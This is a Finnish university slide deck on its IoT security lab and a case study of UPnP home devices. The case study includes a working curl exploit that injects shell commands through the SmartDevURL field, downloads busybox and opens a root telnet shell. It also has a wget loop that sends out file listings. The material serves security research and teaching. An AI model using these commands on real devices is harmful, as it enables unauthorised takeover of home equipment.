Yliopiston IoT-laboratorio esineiden tietoturvaa 19.5.2016 Tuomas Tenkanen tutkimusavustaja Jyväskylän yliopisto tuomas.s.tenkanen@jyu.fi
LaiTSo Jyväskylän yliopiston IoT-laboratorio on perustettu osana INKA EAKR Laiteläheinen tietoturvateknologia ja sovellutusmahdollisuudet (LaiTSo) -projektia. Projektin rahoittajina EAKR/Tekes, Jyväskylän yliopisto, Keski-Suomen liitto, Jyväskylän seudun kehittämisyhtiö Jykes, Pardco Group Oy ja Lookinno Oy. Vastuullisena johtajana dekaani Pekka Neittaanmäki, projektipäällikkönä Otto Hrad.
Internet of Things "A global infrastructure for the information society, enabling advanced services by interconnecting (physical and virtual) things based on existing and evolving interoperable information and communication technologies." ITU-T
Thing "With regard to the Internet of things, this is an object of the physical world (physical things) or the information world (virtual things), which is capable of being identified and integrated into communication networks." ITU-T Mikä tahansa verkkoon liitettävä laite. Yleensä ei perinteinen tietokone tai verkkolaite tietokoneen käsite hämärtyy IPv4/IPv6 (TCP, UDP, ICMP), mutta laajemmin ajateltuna myös muut verkkoteknologiat.
IoT-ennusteita Vuonna 2016 6-10 miljardia laitetta Gartner, Business Insider Vuonna 2020 20-30 (-100) miljardia laitetta McKinsey, Gartner, Business Insider Vertailuna 2016: 3,3 mrd internet-käyttäjää 1 mrd web-sivustoa Internet Live Stats
Automaatiojärjestelmät 21.3.2013 Suomalaisia automaatiojärjestelmiä suojaamattomana verkossa Viestintävirasto 2013, Tiilikainen & Manner n. 3000 laitetta suojaamattomana verkossa 31.3.2015 Viestintävirasto etsii tietoverkoista suojaamattomia automaatiolaitteita Viestintävirasto 2015a 29.6.2015 Yhä suuri määrä suojaamattomia automaatiojärjestelmiä Viestintävirasto 2015b, Viestintävirasto 2015c ei merkittävää muutosta 16.5.2016 Viestintävirasto jatkaa selvityksiä automaatiojärjestelmien suojaamattomista yhteyksistä Viestintävirasto 2016 "Selvitys toteutetaan lähettämällä yhteydenavauspyyntöjä suomalaisissa verkoissa olevien tietokoneiden ja verkkolaitteiden tiettyihin tietoliikenneportteihin ja tarkkailemalla niistä tulevia vastausviestejä."
Jääkaappi hyökkää Tekniikka & Talous 2016 ilmalämpöpumppu valvontakamera lypsyrobotti viritinvahvistin laajakaistamodeemi mediatoistin roskaposti hajautettu palvelunestohyökkäys firmware-päivitykset ohjelmistopäivitykset salasanojen vaihtaminen tietoliikenneporttien vaihtaminen
JY:n IoT-laboratorio IoT-laboratorio on tutkimuslähtöinen laboratorioympäristö tukemaan tutkimusta, jossa laskenta-alusta on liitetty erilaisiin sensoreihin, laitteisiin ja tietoväyliin, joilla voidaan kerätä ja lukea tietoa, sekä luoda tutkimusta tukevia toimintaympäristöjä, ja jossa aiemmin kehitettyjä ratkaisuja voidaan edelleen kehittää erilaisiin ympäristöihin soveltuviksi sekä ottaa turvallisuusratkaisut osaksi kyberturvallisuuskoulutusta. Tarkoituksena luoda kotikäyttäjän verkkoa vastaava wlan-verkko, jossa voidaan tutkia kodin IoT-laitteiden tietoturvaa ja -liikennettä. Tutkimuksen kannalta oleellista saada kaapattua laitteilta tuleva ja laitteille menevä liikenne sekä voida tutkia pakettikaappauksia jälkikäteen. Pakettien kaappaaminen reitittimeltä, joten asennettiin pöytäkone reitittimeksi internetin ja wlan-verkon väliin. Tällöin kaappaus voidaan tehdä reititinkoneen verkkokortin kautta.
IoT-laboratorion verkko 4g-yhteys internetiin 4g-reititin Kali Linux -reititinkone liikenteen seuranta pakettikaappaukset Wlan-reititin
IoT-laboratorion laitteita
Case study Tutkittava laiteperhe sisältää etähallittavia kodin elektroniikkalaitteita. UPnP on joukko protokollia, joiden tarkoitus on saada erilaiset verkkolaitteet toimimaan helposti keskenään Laitteet lähettävät ja vastaanottavat UPnP-viestejä, joilla voidaan ohjata laitteiden toimintoja. UPnP ei protokollana sisällä autentikointia vaan esim. WeMo-laitteiden osalta käyttäjän on luotettava wlan-verkon suojaukseen Laitteet myös mainostavat verkkoon omia palveluitaan protokollan mukaisesti: esim. JY IoT-laboratorion laitteen palvelukuvaukset löytyvät osoitteesta http://192.168.16.194:49153/setup.xml
Tunnettu haavoittuvuus Tripwire/The State of Security julkaisi 25.11.2015 Bryon Hartin artikkelin My SecTor Story: Root Shell on the ###### Artikkelissa kuvataan miten tutkittavaan laitteeseen saadaan telnet-yhteys ja root-oikeudet UPnP-viestejä ja Linuxin command substitution -toiminnallisuutta hyödyntäen. Haavoittuvuus ei ollut suoraan toistettavissa laboratorion laitteilla, koska laitteista puuttui telnetd-ohjelma. Laboratoriossa pystyttiin kuitenkin suorittamaan komentoja laitteilla, esim. reboot-komennolla pystyttiin käynnistämään laite uudestaan.
Jatkotutkimuksia Jatkotutkimuksissa pyrittiin selvittämään mitä ohjelmia laboratorion laitteilla on asennettuna. Havaittiin, että esim. ls, ping ja wget ovat asennettuna ja sekä if- että for-kontrollirakenteet toimivat. Näillä tiedoilla pystyttiin varmistamaan, että komentoja voidaan todellakin ajaa ko. laitteilla ja saatiin lisää tietoja laitteista, mm. tiedostolistaukset http-pyyntöjen kautta: for a in ls /bin; do wget http://192.168.16.1/$a; done. Lisäksi pystyttiin selvittämään laitteiden arkkitehtuuri ja siten etsimään oikean tyyppisiä ohjelmia ajettavaksi laitteilla. Havaittiin, että laitteet käyttävät riisuttua busybox-versiota komentotulkkina, minkä vuoksi telnetd-toimintoa ei ole käytettävissä. Asennettiin laboratorion verkkoon http-palvelin tarjoamaan täysi versio busyboxista mips-arkkitehtuurille. Ohjeistettiin UPnP-viestillä tutkittava laite hakemaan uusi busybox ja käynnistämään sillä telnetd laitteelle. Tämän jälkeen voitiin kirjautua telnetillä root-oikeuksin laitteeseen ja saatiin alkuperäinen haavoittuvuus vahvistettua.
Miten curl -0 -A '' -X POST -H 'Accept: ' -H 'Content-type: text/xml; charset="utf-8"' \ -H "SOAPACTION: \"urn:######:service:basicevent:1#setsmartdevinfo\"" \ --data '<?xml version="1.0" encoding="utf-8"?> \ <s:envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" \ s:encodingstyle="http://schemas.xmlsoap.org/soap/encoding/"> \ <s:body><u:setsmartdevinfo xmlns:u="urn:######:service:basicevent:1"> \ <SmartDevURL>\ `cp /bin/busybox /tmp/busybox; \ wget http://192.168.16.1/busybox; \ cp /tmp/busybox /tmp/telnetd; \ cp /tmp/busybox /tmp/sh; \ /tmp/telnetd -l /tmp/sh`\ </SmartDevURL></u:SetSmartDevInfo></s:Body></s:Envelope>'\ -i http://192.168.16.194:49153/upnp/control/basicevent1
Hyökkäysskenaario Laitteissa firmware-päivitystoiminto ja päivittämättömistä laitteista saadaan koko tiedostojärjestelmä ulos. On mahdollista ladata laitteesta vanha firmwareversio, muokata sitä (esim. versionumero, tarjolla olevat ohjelmat, käynnistyessä ajettavat ohjelmat), allekirjoittaa muokattu firmware laitteisiin sisältyvällä avaimella ja tarjota väärää päivitystä olemassa oleville laitteille. Menetelmä ei ole yksinkertainen, mutta teoriassa mahdollistaa kaikkien saman tuoteperheen laitteiden haltuunottamisen.
Toinen haavoittuvuus 3.3.2016 saatiin vahvistettua, että myös toisen hyvin samankaltaisen UPnP-viestin käsittelyyn liittyy vastaava, aiemmin tuntematon haavoittuvuus. Valmistaja on korjannut molemmat URLosoitteiden käsittelyyn liittyvät haavoittuvuudet toukokuussa 2015 julkaistulla firmwarepäivityksellä. Laboratorion laitteet on hankittu marras-joulukuun 2015 aikana, joten kaupoissa on edelleen saatavilla haavoittuvia laitteita.
Yleisiä havaintoja kodin IoT-laitteista Edullisia Linux-pohjaisia toteutuksia, osa hyvinkin vanhoja Useimpien laitteiden suojaus perustuu vain ja ainoastaan verkon suojaukseen mikäli pääsy verkkoon, pääsy laitteille Laitteet voidaan kaataa esim. DOS-hyökkäyksillä. Laitteet saadaan pakotettua toiseen wlan-verkkoon. Joidenkin laitteiden tiedostojärjestelmät saadaan ulos suoraan tallennusvälineiltä muualle verkkoon (dd, ftpput) Laitteet hakevat kysymättä käyttäjän tietoja puhelimelta, jolla laitteita hallitaan. Laitteet lähettävät kysymättä tietoja valmistajalle. Laitteet vaikuttavat toimivan osittain epäluotettavasti ja arvaamattomasti. selkeästi ensimmäisen sukupolven laitteita Jotkut laitteet huomattavasti luotettavammin toteutettuja kuin toiset hinta ei korreloi
TIEA345, IoT-prototyypit Yhtenä tavoitteena LaiTSo-projektille ja siten IoTlaboratoriolle on kehittää opetusta IT-tiedekunnassa ja tietotekniikan laitoksella. Ensimmäisenä tuloksena kesäperiodissa 2016 järjestetään pilottitoteutus TIEA345 IoT-prototyypit - kurssista. "Kurssilla tutustutaan IoT-laitteisiin hands-on -tyylillä. Alustana Raspberry Pi sekä mahdollisesti muita. Kurssi suoritetaan käytännön demoilla, joissa kootaan toimiva laitekokonaisuus ja opetellaan lukemaan dataa sensoreilta sekä siirtämään sitä verkkoon."
Laitekirjasto IoT-laboratorion tavoitteisiin kuuluu myös muun tutkimuksen tukeminen ja tätä tarkoitusta varten perustetaan IoT-aiheinen laitekirjasto. Esimerkkinä laitekirjaston toiminnasta Raspberry Pi + SenseHAT -yhdistelmä liikunta-aktiivisuustutkimuksessa.
Kybertiimin muita tutkimusaiheita tilannetietoinen kyberturvallisuus tilannekuvajärjestelmät salatun liikenteen NIDS kriittisen infrastruktuurin turvaaminen hunajapurkit työkaluina haittaohjelma-analyysi DNS-tunnelointihyökkäysten analyysi
Lähteet Business Insider http://www.businessinsider.com/how-the-internet-of-things-market-will-grow-2014-10?r=us&ir=t&ir=t Gartner http://www.gartner.com/newsroom/id/3165317 Internet Live Stats http://www.internetlivestats.com/ ITU-T http://handle.itu.int/11.1002/1000/11559-en?locatt=format:pdf&auth McKinsey http://www.mckinsey.com/industries/high-tech/our-insights/the-internet-of-things-sizing-up-the-opportunity My SecTor Story http://www.tripwire.com/state-of-security/featured/my-sector-story-root-shell-on-the-belkin-wemo-switch/ Tekniikka & Talous 2016 http://www.tekniikkatalous.fi/tekniikka/tiesitteko-etta-ilmalampopumppuanne-kaytetaan-palvelunestohyokkaykseen-nettiin-kytketytlaitteet-levittavat-haittaohjelmia-6244933 Tiilikainen & Manner https://research.comnet.aalto.fi/public/aalto-shodan-raportti-julkinen.pdf Viestintävirasto 2013 https://www.viestintavirasto.fi/kyberturvallisuus/tietoturvanyt/2013/03/ttn201303211339.html Viestintävirasto 2015a https://www.viestintavirasto.fi/kyberturvallisuus/tietoturvanyt/2015/03/ttn201503311629.html Viestintävirasto 2015b https://www.viestintavirasto.fi/kyberturvallisuus/tietoturvanyt/2015/06/ttn201506291423.html Viestintävirasto 2015c https://www.viestintavirasto.fi/attachments/cert/tietoturvakatsaukset/erityisraportti_suojaamattomia_automaatiolaitteita_suomalaisi ssa_verkoissa.pdf Viestintävirasto 2016 https://www.viestintavirasto.fi/kyberturvallisuus/tietoturvanyt/2016/05/ttn201605160958.html